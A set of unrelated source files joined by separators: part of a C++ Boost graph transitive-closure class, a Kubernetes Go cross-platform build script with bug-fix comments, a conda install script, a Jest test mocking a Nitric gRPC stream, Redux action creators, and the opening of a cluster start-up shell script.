void transitive_closure_main(){
vertex_iter vi,v_end;
timer::auto_cpu_timer t;
for(boost::tie(vi,v_end)=vertices(*g);vi!=v_end;++vi){
Vertex v=*vi;
if(get(num,v)==0){
tc(v);
}
}
};
public:
/**
* This is the constructor of the TransitiveClosure class. It takes the reference of the already allocated graph
* done by the caller (main_transitive_closure.cpp).
* The constructor initializes all the class attributes in proper way
* @param graph pointer
*/
TransitiveClosure(Graph*graph){
g=graph;
//Insertion and handling of a new vertex with lowest num possible in order to accomplish algorithm correctness
Vertex starter=add_vertex(*g);
int n=num_vertices(*g);
numVet=*new std::vector<int>(n);
num=make_iterator_property_map(numVet.begin(),get(vertex_index,*g));
put(num, starter, -1);
s.push(starter);
remove_vertex(starter,*g);
//Updating number of graph's vertices
n--;
//data structures allocation
rootVet.resize(n);
inCompVet.resize(n);
sets.resize(n);
vect.resize(n);
//Properties instantiation
root=make_iterator_property_map(rootVet.begin(), get(vertex_index,*g));
inComp= make_iterator_property_map(inCompVet.begin(), get(vertex_index,*g));
succ=make_iterator_property_map(sets.begin(),get(vertex_index,*g));
//index needed
index=0;
}
/**
* This function is called by the main_transitive_closure callee. It launches the procedure and prints the
* procedure's result when it is done.
*/
void transitive_closure_scc(){
//Execution of the procedure
transitive_closure_main();
//Printing our results
std::cout << "Ours" << std::endl;
IndexMap index = get(vertex_index,*g);
vertex_iter it, it_end;
for(boost::tie(it,it_end)=vertices(*g);it!=it_end;++it){
Vertex v=*it;
std::set<Vertex>* set=get(succ,get(root,v));
std::cout << index[*it] << " --> ";
std::set<Vertex>::iterator i;
for(i=set->begin();i!=set->end();++i){
std::cout << *i << " ";
}
std::cout << std::endl;
}
}
};
|
#!/bin/bash
# Copyright 2014 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# The golang package that we are building.
readonly KUBE_GO_PACKAGE=k8s.io/kubernetes
readonly KUBE_GOPATH="${KUBE_OUTPUT}/go"

# Load contrib target functions.
# BUGFIX: KUBERNETES_CONTRIB is a space-separated list; it must be expanded
# UNQUOTED so each entry is sourced individually (quoting the expansion made
# the loop treat the whole list as one name).
if [ -n "${KUBERNETES_CONTRIB:-}" ]; then
  for contrib in ${KUBERNETES_CONTRIB}; do
    source "${KUBE_ROOT}/contrib/${contrib}/target.sh"
  done
fi
# The set of server targets that we are only building for Linux
# Note: if you are adding something here, you might need to add it to
# kube::build::source_targets in build/common.sh as well.
#
# Prints the space-separated server binary targets, including any added by
# KUBERNETES_CONTRIB extensions.
kube::golang::server_targets() {
  local targets=(
    cmd/kube-dns
    cmd/kube-proxy
    cmd/kube-apiserver
    cmd/kube-controller-manager
    cmd/kubelet
    cmd/kubemark
    cmd/hyperkube
    federation/cmd/federation-apiserver
    federation/cmd/federation-controller-manager
    plugin/cmd/kube-scheduler
  )
  if [ -n "${KUBERNETES_CONTRIB:-}" ]; then
    # BUGFIX: expand unquoted — KUBERNETES_CONTRIB is a space-separated list.
    for contrib in ${KUBERNETES_CONTRIB}; do
      targets+=($(eval "kube::contrib::${contrib}::server_targets"))
    done
  fi
  echo "${targets[@]}"
}
# Materialize the server target/binary lists once at load time.
readonly KUBE_SERVER_TARGETS=($(kube::golang::server_targets))
# ${name##*/} strips the directory portion, leaving bare binary names.
readonly KUBE_SERVER_BINARIES=("${KUBE_SERVER_TARGETS[@]##*/}")

# Fast builds restrict the platform matrix to the local architecture.
if [[ "${KUBE_FASTBUILD:-}" == "true" ]]; then
  readonly KUBE_SERVER_PLATFORMS=(linux/amd64)
  if [[ "${KUBE_BUILDER_OS:-}" == "darwin"* ]]; then
    readonly KUBE_TEST_PLATFORMS=(
      darwin/amd64
      linux/amd64
    )
    readonly KUBE_CLIENT_PLATFORMS=(
      darwin/amd64
      linux/amd64
    )
  else
    readonly KUBE_TEST_PLATFORMS=(linux/amd64)
    readonly KUBE_CLIENT_PLATFORMS=(linux/amd64)
  fi
else
  # The server platform we are building on.
  readonly KUBE_SERVER_PLATFORMS=(
    linux/amd64
    linux/arm
    linux/arm64
    linux/ppc64le  # note: hyperkube is temporarily disabled due to a linking error
  )

  # If we update this we should also update the set of golang compilers we build
  # in 'build/build-image/cross/Dockerfile'. However, it's only a bit faster since go 1.5, not mandatory
  readonly KUBE_CLIENT_PLATFORMS=(
    linux/amd64
    linux/386
    linux/arm
    linux/arm64
    linux/ppc64le
    darwin/amd64
    darwin/386
    windows/amd64
    windows/386
  )

  # Which platforms we should compile test targets for. Not all client platforms need these tests
  readonly KUBE_TEST_PLATFORMS=(
    linux/amd64
    darwin/amd64
    windows/amd64
    linux/arm
  )
fi

# The set of client targets that we are building for all platforms
readonly KUBE_CLIENT_TARGETS=(
  cmd/kubectl
)
readonly KUBE_CLIENT_BINARIES=("${KUBE_CLIENT_TARGETS[@]##*/}")
# ${name/%/.exe} appends the Windows executable suffix to each entry.
readonly KUBE_CLIENT_BINARIES_WIN=("${KUBE_CLIENT_BINARIES[@]/%/.exe}")
# The set of test targets that we are building for all platforms.
#
# Prints the space-separated test binary targets, including any added by
# KUBERNETES_CONTRIB extensions.
kube::golang::test_targets() {
  local targets=(
    cmd/gendocs
    cmd/genkubedocs
    cmd/genman
    cmd/genyaml
    cmd/mungedocs
    cmd/genswaggertypedocs
    cmd/linkcheck
    examples/k8petstore/web-server/src
    federation/cmd/genfeddocs
    vendor/github.com/onsi/ginkgo/ginkgo
    test/e2e/e2e.test
    test/e2e_node/e2e_node.test
  )
  if [ -n "${KUBERNETES_CONTRIB:-}" ]; then
    # BUGFIX: expand unquoted — KUBERNETES_CONTRIB is a space-separated list.
    for contrib in ${KUBERNETES_CONTRIB}; do
      targets+=($(eval "kube::contrib::${contrib}::test_targets"))
    done
  fi
  echo "${targets[@]}"
}
# Materialize the test target/binary lists once at load time.
readonly KUBE_TEST_TARGETS=($(kube::golang::test_targets))
readonly KUBE_TEST_BINARIES=("${KUBE_TEST_TARGETS[@]##*/}")
readonly KUBE_TEST_BINARIES_WIN=("${KUBE_TEST_BINARIES[@]/%/.exe}")
# Test artifacts that are shipped as-is (scripts/manifests), not compiled.
readonly KUBE_TEST_PORTABLE=(
  test/e2e/testing-manifests
  test/kubemark
  hack/e2e.go
  hack/e2e-internal
  hack/get-build.sh
  hack/ginkgo-e2e.sh
  hack/federated-ginkgo-e2e.sh
  hack/lib
)

# Gigabytes desired for parallel platform builds. 11 is fairly
# arbitrary, but is a reasonable splitting point for 2015
# laptops-versus-not.
#
# If you are using boot2docker, the following seems to work (note
# that 12000 rounds to 11G):
#   boot2docker down
#   VBoxManage modifyvm boot2docker-vm --memory 12000
#   boot2docker up
readonly KUBE_PARALLEL_BUILD_MEMORY=11

readonly KUBE_ALL_TARGETS=(
  "${KUBE_SERVER_TARGETS[@]}"
  "${KUBE_CLIENT_TARGETS[@]}"
  "${KUBE_TEST_TARGETS[@]}"
)
readonly KUBE_ALL_BINARIES=("${KUBE_ALL_TARGETS[@]##*/}")

# Binaries that must be built statically (CGO disabled); consulted by
# kube::golang::is_statically_linked_library below.
readonly KUBE_STATIC_LIBRARIES=(
  kube-apiserver
  kube-controller-manager
  kube-dns
  kube-scheduler
  kube-proxy
  kubectl
  federation-apiserver
  federation-controller-manager
)
# Returns 0 (true) when target path $1 names a binary that must be statically
# linked, per KUBE_STATIC_LIBRARIES or the KUBE_STATIC_OVERRIDES escape hatch.
kube::golang::is_statically_linked_library() {
  local e
  for e in "${KUBE_STATIC_LIBRARIES[@]}"; do [[ "$1" == *"/$e" ]] && return 0; done;
  # Allow individual overrides--e.g., so that you can get a static build of
  # kubectl for inclusion in a container.
  if [ -n "${KUBE_STATIC_OVERRIDES:+x}" ]; then
    for e in "${KUBE_STATIC_OVERRIDES[@]}"; do [[ "$1" == *"/$e" ]] && return 0; done;
  fi
  return 1;
}
# kube::golang::binaries_from_targets takes a list of build targets and
# prints the full go package path for each, one per line.
kube::golang::binaries_from_targets() {
  local target
  for target in "$@"; do
    # Targets that start with what looks like a domain name are assumed to be
    # fully qualified already; everything else gets the Kubernetes package
    # path prepended.
    if [[ "${target}" =~ ^([[:alnum:]]+".")+[[:alnum:]]+"/" ]]; then
      echo "${target}"
    else
      echo "${KUBE_GO_PACKAGE}/${target}"
    fi
  done
}
# Asks golang what it thinks the host platform is. The go tool chain does some
# slightly different things when the target platform matches the host platform.
# Prints "os/arch", e.g. "linux/amd64".
kube::golang::host_platform() {
  echo "$(go env GOHOSTOS)/$(go env GOHOSTARCH)"
}
# Prints the platform currently targeted: honors GOOS/GOARCH when set and
# non-empty, otherwise falls back to the host values from `go env`.
kube::golang::current_platform() {
  local os="${GOOS-}"
  local arch="${GOARCH-}"
  [[ -n "${os}" ]] || os=$(go env GOHOSTOS)
  [[ -n "${arch}" ]] || arch=$(go env GOHOSTARCH)
  echo "${os}/${arch}"
}
# Takes the platform name ($1) and sets the appropriate golang env variables
# for that platform.
kube::golang::set_platform_envs() {
  [[ -n ${1-} ]] || {
    kube::log::error_exit "!!! Internal error. No platform set in kube::golang::set_platform_envs"
  }

  # BUGFIX: the function validated $1 but then read the caller's ${platform}
  # variable; bind the argument locally so $1 is what is actually used.
  local platform="${1}"

  export GOOS=${platform%/*}
  export GOARCH=${platform##*/}

  # Do not set CC when building natively on a platform, only if cross-compiling from linux/amd64
  if [[ $(kube::golang::host_platform) == "linux/amd64" ]]; then
    # Dynamic CGO linking for other server architectures than linux/amd64 goes here
    # If you want to include support for more server platforms than these, add arch-specific gcc names here
    if [[ ${platform} == "linux/arm" ]]; then
      export CGO_ENABLED=1
      export CC=arm-linux-gnueabi-gcc
    elif [[ ${platform} == "linux/arm64" ]]; then
      export CGO_ENABLED=1
      export CC=aarch64-linux-gnu-gcc
    elif [[ ${platform} == "linux/ppc64le" ]]; then
      export CGO_ENABLED=1
      export CC=powerpc64le-linux-gnu-gcc
    fi
  fi
}
# Clears every cross-compile related variable set by set_platform_envs.
kube::golang::unset_platform_envs() {
  unset GOOS GOARCH CGO_ENABLED CC
}
# Create the GOPATH tree under $KUBE_OUTPUT: a fake GOPATH whose package dir
# is a symlink back to the real source checkout.
kube::golang::create_gopath_tree() {
  local go_pkg_dir="${KUBE_GOPATH}/src/${KUBE_GO_PACKAGE}"
  local go_pkg_basedir=$(dirname "${go_pkg_dir}")

  mkdir -p "${go_pkg_basedir}"
  # Remove any stale symlink before recreating it.
  rm -f "${go_pkg_dir}"

  # TODO: This symlink should be relative.
  ln -s "${KUBE_ROOT}" "${go_pkg_dir}"
}
# Ensure the godep tool exists and is a viable version.
# Prints usage help and returns 2 when godep is missing or too old.
kube::golang::verify_godep_version() {
  local -a godep_version_string
  local godep_version
  local godep_min_version="63"

  if ! which godep &>/dev/null; then
    kube::log::usage_from_stdin <<EOF
Can't find 'godep' in PATH, please fix and retry.
See https://github.com/kubernetes/kubernetes/blob/master/docs/devel/development.md#godep-and-dependency-management for installation instructions.
EOF
    return 2
  fi

  # "godep version" prints e.g. "godep v63 (...)"; strip the leading "v"
  # from the second word so the arithmetic comparison below works.
  godep_version_string=($(godep version))
  godep_version=${godep_version_string[1]/v/}

  if ((godep_version<$godep_min_version)); then
    kube::log::usage_from_stdin <<EOF
Detected godep version: ${godep_version_string[*]}.
Kubernetes requires godep v$godep_min_version or greater.
Please update:
go get -u github.com/tools/godep
EOF
    return 2
  fi
}
# Ensure the go tool exists and is a viable version.
# Prints usage help and returns 2 when go is missing or older than 1.6.
kube::golang::verify_go_version() {
  if [[ -z "$(which go)" ]]; then
    kube::log::usage_from_stdin <<EOF
Can't find 'go' in PATH, please fix and retry.
See http://golang.org/doc/install for installation instructions.
EOF
    return 2
  fi

  local go_version
  go_version=($(go version))
  # Development builds ("go version devel +hash ...") are always accepted.
  if [[ "${go_version[2]}" == "devel"* ]]; then
    return 0
  fi
  # BUGFIX: compare numerically. The previous lexicographic check
  # [[ "..." < "go1.6" ]] wrongly rejected go1.10 and later, because
  # "go1.10" sorts before "go1.6" as a string.
  local major minor
  major=$(echo "${go_version[2]}" | sed -n 's/^go\([0-9]\{1,\}\)\..*/\1/p')
  minor=$(echo "${go_version[2]}" | sed -n 's/^go[0-9]\{1,\}\.\([0-9]\{1,\}\).*/\1/p')
  if [[ -z "${major}" || -z "${minor}" ]] || (( major < 1 )) || (( major == 1 && minor < 6 )); then
    kube::log::usage_from_stdin <<EOF
Detected go version: ${go_version[*]}.
Kubernetes requires go version 1.6 or greater.
Please install Go version 1.6 or later.
EOF
    return 2
  fi
}
# kube::golang::setup_env will check that the `go` commands is available in
# ${PATH}. It will also check that the Go version is good enough for the
# Kubernetes build.
#
# Inputs:
#   KUBE_EXTRA_GOPATH - If set, this is included in created GOPATH
#
# Outputs:
#   env-var GOPATH points to our local output dir
#   env-var GOBIN is unset (we want binaries in a predictable place)
#   env-var GO15VENDOREXPERIMENT=1
#   current directory is within GOPATH
kube::golang::setup_env() {
  kube::golang::verify_go_version

  kube::golang::create_gopath_tree

  export GOPATH=${KUBE_GOPATH}

  # Append KUBE_EXTRA_GOPATH to the GOPATH if it is defined.
  if [[ -n ${KUBE_EXTRA_GOPATH:-} ]]; then
    GOPATH="${GOPATH}:${KUBE_EXTRA_GOPATH}"
  fi

  # Change directories so that we are within the GOPATH.  Some tools get really
  # upset if this is not true.  We use a whole fake GOPATH here to collect the
  # resultant binaries.  Go will not let us use GOBIN with `go install` and
  # cross-compiling, and `go install -o <file>` only works for a single pkg.
  local subdir
  subdir=$(kube::realpath . | sed "s|$KUBE_ROOT||")
  cd "${KUBE_GOPATH}/src/${KUBE_GO_PACKAGE}/${subdir}"

  # Unset GOBIN in case it already exists in the current session.
  unset GOBIN

  # This seems to matter to some tools (godep, ugorji, ginkgo...)
  export GO15VENDOREXPERIMENT=1
}
# This will take binaries from $GOPATH/bin and copy them to the appropriate
# place in ${KUBE_OUTPUT_BINDIR}
#
# Ideally this wouldn't be necessary and we could just set GOBIN to
# KUBE_OUTPUT_BINDIR but that won't work in the face of cross compilation.  'go
# install' will place binaries that match the host platform directly in $GOBIN
# while placing cross compiled binaries into `platform_arch` subdirs.  This
# complicates pretty much everything else we do around packaging and such.
kube::golang::place_bins() {
  local host_platform
  host_platform=$(kube::golang::host_platform)

  kube::log::status "Placing binaries"

  local platform
  for platform in "${KUBE_CLIENT_PLATFORMS[@]}"; do
    # The substitution on platform_src below will replace all slashes with
    # underscores.  It'll transform darwin/amd64 -> darwin_amd64.
    local platform_src="/${platform//\//_}"
    # Host-platform binaries live directly in $GOPATH/bin (no subdir).
    if [[ $platform == $host_platform ]]; then
      platform_src=""
    fi

    local full_binpath_src="${KUBE_GOPATH}/bin${platform_src}"
    if [[ -d "${full_binpath_src}" ]]; then
      mkdir -p "${KUBE_OUTPUT_BINPATH}/${platform}"
      # rsync -pt preserves permissions/mtimes so unchanged binaries keep
      # their timestamps.
      find "${full_binpath_src}" -maxdepth 1 -type f -exec \
        rsync -pt {} "${KUBE_OUTPUT_BINPATH}/${platform}" \;
    fi
  done
}
# Checks whether the CGO-flavored Go stdlib is installed (or installable) for
# the host; when it is not, warns and falls back to `go build`.
# NOTE(review): sets `use_go_build=true` in the CALLER's scope — relies on
# being invoked from a function that declared that variable.
kube::golang::fallback_if_stdlib_not_installable() {
  local go_root_dir=$(go env GOROOT);
  local go_host_os=$(go env GOHOSTOS);
  local go_host_arch=$(go env GOHOSTARCH);
  local cgo_pkg_dir=${go_root_dir}/pkg/${go_host_os}_${go_host_arch}_cgo;

  if [ -e ${cgo_pkg_dir} ]; then
    return 0;
  fi

  if [ -w ${go_root_dir}/pkg ]; then
    return 0;
  fi

  kube::log::status "+++ Warning: stdlib pkg with cgo flag not found.";
  kube::log::status "+++ Warning: stdlib pkg cannot be rebuilt since ${go_root_dir}/pkg is not writable by `whoami`";
  kube::log::status "+++ Warning: Make ${go_root_dir}/pkg writable for `whoami` for a one-time stdlib install, Or"
  kube::log::status "+++ Warning: Rebuild stdlib using the command 'CGO_ENABLED=0 go install -a -installsuffix cgo std'";
  kube::log::status "+++ Falling back to go build, which is slower";

  use_go_build=true
}
# Builds the toolchain necessary for building kube. This needs to be
# built only on the host platform.
# TODO: This builds only the `teststale` binary right now. As we expand
# this function's capabilities we need to find this a right home.
# Ideally, not a shell script because testing shell scripts is painful.
# NOTE(review): reads `goflags`/`goldflags` from the caller's scope
# (kube::golang::build_binaries) rather than taking them as arguments.
kube::golang::build_kube_toolchain() {
  local targets=(
    hack/cmd/teststale
  )

  local binaries
  binaries=($(kube::golang::binaries_from_targets "${targets[@]}"))

  kube::log::status "Building the toolchain targets:" "${binaries[@]}"
  go install "${goflags[@]:+${goflags[@]}}" \
      -ldflags "${goldflags}" \
      "${binaries[@]:+${binaries[@]}}"
}
# Try and replicate the native binary placement of go install without
# calling go install: prints where the binary for target $1 on platform $2
# will land under $KUBE_GOPATH/bin.
# NOTE(review): reads `host_platform` and GOOS from the calling scope —
# assumes set_platform_envs ran for this platform.
kube::golang::output_filename_for_binary() {
  local binary=$1
  local platform=$2
  local output_path="${KUBE_GOPATH}/bin"
  # Cross-compiled binaries go into an os_arch subdirectory.
  if [[ $platform != $host_platform ]]; then
    output_path="${output_path}/${platform//\//_}"
  fi
  local bin=$(basename "${binary}")
  if [[ ${GOOS} == "windows" ]]; then
    bin="${bin}.exe"
  fi
  echo "${output_path}/${bin}"
}
# Builds all binaries in the caller-scoped `binaries` array for one platform
# ($1), splitting them into static, non-static and test binaries. $2, when
# non-empty, forces `go build` instead of `go install`.
# NOTE(review): also reads `goflags`/`goldflags` from the calling scope.
kube::golang::build_binaries_for_platform() {
  local platform=$1
  local use_go_build=${2-}

  local -a statics=()
  local -a nonstatics=()
  local -a tests=()

  # Partition the requested binaries by how they must be built.
  for binary in "${binaries[@]}"; do
    # TODO(IBM): Enable hyperkube builds for ppc64le again
    # The current workaround creates a text file with help text instead of a binary
    # We're doing it this way so the build system isn't affected so much
    if [[ "${binary}" == *"hyperkube" && "${platform}" == "linux/ppc64le" ]]; then
      echo "hyperkube build for ppc64le is disabled. Creating dummy text file instead."
      local outfile=$(kube::golang::output_filename_for_binary "${binary}" "${platform}")
      mkdir -p $(dirname ${outfile})
      echo "Not available at the moment. Please see: https://github.com/kubernetes/kubernetes/issues/25886 for more information." > ${outfile}
    elif [[ "${binary}" =~ ".test"$ ]]; then
      tests+=($binary)
    elif kube::golang::is_statically_linked_library "${binary}"; then
      statics+=($binary)
    else
      nonstatics+=($binary)
    fi
  done

  # Static builds need the CGO-disabled stdlib; may flip use_go_build.
  if [[ "${#statics[@]}" != 0 ]]; then
      kube::golang::fallback_if_stdlib_not_installable;
  fi

  if [[ -n ${use_go_build:-} ]]; then
    # Slow path: one `go build` per binary, with progress dots.
    kube::log::progress "    "
    for binary in "${statics[@]:+${statics[@]}}"; do
      local outfile=$(kube::golang::output_filename_for_binary "${binary}" "${platform}")
      CGO_ENABLED=0 go build -o "${outfile}" \
        "${goflags[@]:+${goflags[@]}}" \
        -ldflags "${goldflags}" \
        "${binary}"
      kube::log::progress "*"
    done
    for binary in "${nonstatics[@]:+${nonstatics[@]}}"; do
      local outfile=$(kube::golang::output_filename_for_binary "${binary}" "${platform}")
      go build -o "${outfile}" \
        "${goflags[@]:+${goflags[@]}}" \
        -ldflags "${goldflags}" \
        "${binary}"
      kube::log::progress "*"
    done
    kube::log::progress "\n"
  else
    # Use go install.
    if [[ "${#nonstatics[@]}" != 0 ]]; then
      go install "${goflags[@]:+${goflags[@]}}" \
        -ldflags "${goldflags}" \
        "${nonstatics[@]:+${nonstatics[@]}}"
    fi
    if [[ "${#statics[@]}" != 0 ]]; then
      CGO_ENABLED=0 go install -installsuffix cgo "${goflags[@]:+${goflags[@]}}" \
        -ldflags "${goldflags}" \
        "${statics[@]:+${statics[@]}}"
    fi
  fi

  for test in "${tests[@]:+${tests[@]}}"; do
    local outfile=$(kube::golang::output_filename_for_binary "${test}" \
      "${platform}")

    local testpkg="$(dirname ${test})"

    # Staleness check always happens on the host machine, so we don't
    # have to locate the `teststale` binaries for the other platforms.
    # Since we place the host binaries in `$KUBE_GOPATH/bin`, we can
    # assume that the binary exists there, if it exists at all.
    # Otherwise, something has gone wrong with building the `teststale`
    # binary and we should safely proceed building the test binaries
    # assuming that they are stale. There is no good reason to error
    # out.
    if test -x "${KUBE_GOPATH}/bin/teststale" && ! "${KUBE_GOPATH}/bin/teststale" -binary "${outfile}" -package "${testpkg}"
    then
      continue
    fi

    # `go test -c` below directly builds the binary. It builds the packages,
    # but it never installs them. `go test -i` only installs the dependencies
    # of the test, but not the test package itself. So neither `go test -c`
    # nor `go test -i` installs, for example, test/e2e.a. And without that,
    # doing a staleness check on k8s.io/kubernetes/test/e2e package always
    # returns true (always stale). And that's why we need to install the
    # test package.
    go install "${goflags[@]:+${goflags[@]}}" \
        -ldflags "${goldflags}" \
        "${testpkg}"

    mkdir -p "$(dirname ${outfile})"
    go test -c \
      "${goflags[@]:+${goflags[@]}}" \
      -ldflags "${goldflags}" \
      -o "${outfile}" \
      "${testpkg}"
  done
}
# Return approximate physical memory available in gigabytes.
kube::golang::get_physmem() {
  local mem

  # Linux kernel version >=3.14, in kb
  if mem=$(grep MemAvailable /proc/meminfo | awk '{ print $2 }'); then
    echo $(( ${mem} / 1048576 ))
    return
  fi

  # Linux, in kb
  if mem=$(grep MemTotal /proc/meminfo | awk '{ print $2 }'); then
    echo $(( ${mem} / 1048576 ))
    return
  fi

  # OS X, in bytes. Note that get_physmem, as used, should only ever
  # run in a Linux container (because it's only used in the multiple
  # platform case, which is a Dockerized build), but this is provided
  # for completeness.
  if mem=$(sysctl -n hw.memsize 2>/dev/null); then
    echo $(( ${mem} / 1073741824 ))
    return
  fi

  # If we can't infer it, just give up and assume a low memory system
  echo 1
}
# Build binaries targets specified
#
# Input:
#   $@ - targets and go flags.  If no targets are set then all binaries targets
#     are built.
#   KUBE_BUILD_PLATFORMS - Incoming variable of targets to build for.  If unset
#     then just the host architecture is built.
kube::golang::build_binaries() {
  # Create a sub-shell so that we don't pollute the outer environment
  (
    # Check for `go` binary and set ${GOPATH}.
    kube::golang::setup_env
    echo "Go version: $(go version)"

    local host_platform
    host_platform=$(kube::golang::host_platform)

    # Use eval to preserve embedded quoted strings.
    local goflags goldflags
    eval "goflags=(${KUBE_GOFLAGS:-})"
    goldflags="${KUBE_GOLDFLAGS:-} $(kube::version::ldflags)"

    local use_go_build
    local -a targets=()
    local arg

    # Split the incoming arguments into go flags and build targets.
    for arg; do
      if [[ "${arg}" == "--use_go_build" ]]; then
        use_go_build=true
      elif [[ "${arg}" == -* ]]; then
        # Assume arguments starting with a dash are flags to pass to go.
        goflags+=("${arg}")
      else
        targets+=("${arg}")
      fi
    done

    if [[ ${#targets[@]} -eq 0 ]]; then
      targets=("${KUBE_ALL_TARGETS[@]}")
    fi

    local -a platforms=("${KUBE_BUILD_PLATFORMS[@]:+${KUBE_BUILD_PLATFORMS[@]}}")
    if [[ ${#platforms[@]} -eq 0 ]]; then
      platforms=("${host_platform}")
    fi

    local binaries
    binaries=($(kube::golang::binaries_from_targets "${targets[@]}"))

    # Only parallelize across platforms when there is enough memory.
    local parallel=false
    if [[ ${#platforms[@]} -gt 1 ]]; then
      local gigs
      gigs=$(kube::golang::get_physmem)

      if [[ ${gigs} -ge ${KUBE_PARALLEL_BUILD_MEMORY} ]]; then
        kube::log::status "Multiple platforms requested and available ${gigs}G >= threshold ${KUBE_PARALLEL_BUILD_MEMORY}G, building platforms in parallel"
        parallel=true
      else
        kube::log::status "Multiple platforms requested, but available ${gigs}G < threshold ${KUBE_PARALLEL_BUILD_MEMORY}G, building platforms in serial"
        parallel=false
      fi
    fi

    # First build the toolchain before building any other targets
    kube::golang::build_kube_toolchain

    if [[ "${parallel}" == "true" ]]; then
      kube::log::status "Building go targets for ${platforms[@]} in parallel (output will appear in a burst when complete):" "${targets[@]}"
      local platform
      # One background subshell per platform; output buffered to /tmp files.
      for platform in "${platforms[@]}"; do (
          kube::golang::set_platform_envs "${platform}"
          kube::log::status "${platform}: go build started"
          kube::golang::build_binaries_for_platform ${platform} ${use_go_build:-}
          kube::log::status "${platform}: go build finished"
        ) &> "/tmp//${platform//\//_}.build" &
      done

      local fails=0
      for job in $(jobs -p); do
        wait ${job} || let "fails+=1"
      done

      for platform in "${platforms[@]}"; do
        cat "/tmp//${platform//\//_}.build"
      done

      # Propagate the number of failed platform builds as the exit status.
      exit ${fails}
    else
      for platform in "${platforms[@]}"; do
        kube::log::status "Building go targets for ${platform}:" "${targets[@]}"
        kube::golang::set_platform_envs "${platform}"
        kube::golang::build_binaries_for_platform ${platform} ${use_go_build:-}
      done
    fi
  )
}
|
#!/bin/bash
# Conda build script: install ditasic under $PREFIX/opt and symlink its entry
# points into $PREFIX/bin. All $PREFIX expansions are quoted so a prefix
# containing spaces does not word-split.
mkdir -p "$PREFIX/bin"
mkdir -p "$PREFIX/opt/ditasic/"
cp -r * "$PREFIX/opt/ditasic/"
ln -s "$PREFIX/opt/ditasic/ditasic" "$PREFIX/bin/"
ln -s "$PREFIX/opt/ditasic/ditasic_mapping.py" "$PREFIX/bin/"
ln -s "$PREFIX/opt/ditasic/ditasic_matrix.py" "$PREFIX/bin/"
ln -s "$PREFIX/opt/ditasic/core" "$PREFIX/bin/"
<reponame>asalkeld/node-sdk
// Copyright 2021, Nitric Technologies Pty Ltd.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
import { events } from './events';
import { FaasServiceClient } from '@nitric/api/proto/faas/v1/faas_grpc_pb';
const proto = FaasServiceClient.prototype;
// We only need to handle half of the duplex stream
class MockClientStream<Req, Resp> {
  /** Requests captured by write(); inspected by tests. Note: the spelling
   * "recievedMessages" is preserved because tests reference it by name. */
  public recievedMessages: Req[] = [];

  // Callbacks registered via on(), keyed by event name.
  private listeners: {
    [event: string]: ((req: Resp | string) => void)[];
  } = {};

  /** Record an outgoing request instead of sending it over the wire. */
  public write(req: Req) {
    this.recievedMessages.push(req);
  }

  /** Register a callback for the given event name. */
  public on(event: string, cback: (req: Resp) => void) {
    (this.listeners[event] ??= []).push(cback);
  }

  /** Invoke every callback registered for the given event name. */
  public emit(event: string, req: Resp | string) {
    (this.listeners[event] ?? []).forEach((listener) => listener(req));
  }
}
// Snippet tests: each example snippet runs against an in-memory mock of the
// gRPC FaaS trigger stream, so no real service connection is required.
describe('test queues snippets', () => {
  let mockStream = null as any;
  beforeEach(() => {
    // Replace the real duplex stream returned by triggerStream with the mock
    // before every test so snippets never open a network connection.
    mockStream = new MockClientStream() as any;
    jest.spyOn(proto, 'triggerStream').mockReturnValue(mockStream);
  });
  test('events snippet', async () => {
    // Ensure event snippet is valid typescript
    const evtPromise = events();
    // close the stream
    mockStream.emit('end', 'EOF');
    // The snippet must run to completion (resolving with no value) once the
    // mocked stream signals end-of-stream.
    await expect(evtPromise).resolves.toEqual(undefined);
  });
});
|
/*
*
* ExperimentDetailAssetPage actions
*
*/
import {
LOAD_EXPERIMENT_DETAIL_ASSET,
LOAD_EXPERIMENT_DETAIL_ASSET_SUCCESS,
LOAD_EXPERIMENT_DETAIL_ASSET_ERROR,
LOAD_ASSET_META_FIELD,
LOAD_ASSET_META_FIELD_SUCCESS,
LOAD_ASSET_META_FIELD_ERROR,
LOAD_ASSET_BLOB,
LOAD_ASSET_BLOB_SUCCESS,
LOAD_ASSET_BLOB_ERROR,
} from './constants';
/** Action: request the asset list of the given experiment model. */
export const loadExperimentAssetAction = (modelId) => ({
  type: LOAD_EXPERIMENT_DETAIL_ASSET,
  modelId,
});
/** Action: asset list loaded successfully; carries the fetched data. */
export const loadExperimentAssetSuccessAction = (assetData) => ({
  type: LOAD_EXPERIMENT_DETAIL_ASSET_SUCCESS,
  assetData,
});
/** Action: asset list load failed; carries the error. */
export const loadExperimentAssetErrorAction = (error) => ({
  type: LOAD_EXPERIMENT_DETAIL_ASSET_ERROR,
  error,
});
/** Action: request the asset meta fields of the given experiment model. */
export const loadExperimentAssetFieldAction = (modelId) => ({
  type: LOAD_ASSET_META_FIELD,
  modelId,
});
/** Action: asset meta fields loaded successfully; carries the field data. */
export const loadExperimentAssetFieldSuccessAction = (assetFieldData) => ({
  type: LOAD_ASSET_META_FIELD_SUCCESS,
  assetFieldData,
});
/** Action: asset meta field load failed; carries the error. */
export const loadExperimentAssetFieldErrorAction = (error) => ({
  type: LOAD_ASSET_META_FIELD_ERROR,
  error,
});
/** Action: request the raw blob of one asset belonging to a model. */
export function loadAssetBlob(modelId, assetId) {
  return {
    type: LOAD_ASSET_BLOB,
    modelId,
    assetId,
  };
}
/** Action: asset blob loaded successfully; carries the blob data. */
export function loadAssetBlobSuccess(assetBlobData) {
  return {
    type: LOAD_ASSET_BLOB_SUCCESS,
    assetBlobData,
  };
}
/** Action: asset blob load failed; carries the error. */
export function loadAssetBlobError(error) {
  return {
    type: LOAD_ASSET_BLOB_ERROR,
    error,
  };
}
|
#!/usr/bin/env bash
# This script is intended to be as simple as possible i.e execute and have a
# cluster of 3 shelley nodes up and running.

# Repository root, resolved relative to this script's own location.
ROOT="$(realpath "$(dirname "$0")/../..")"
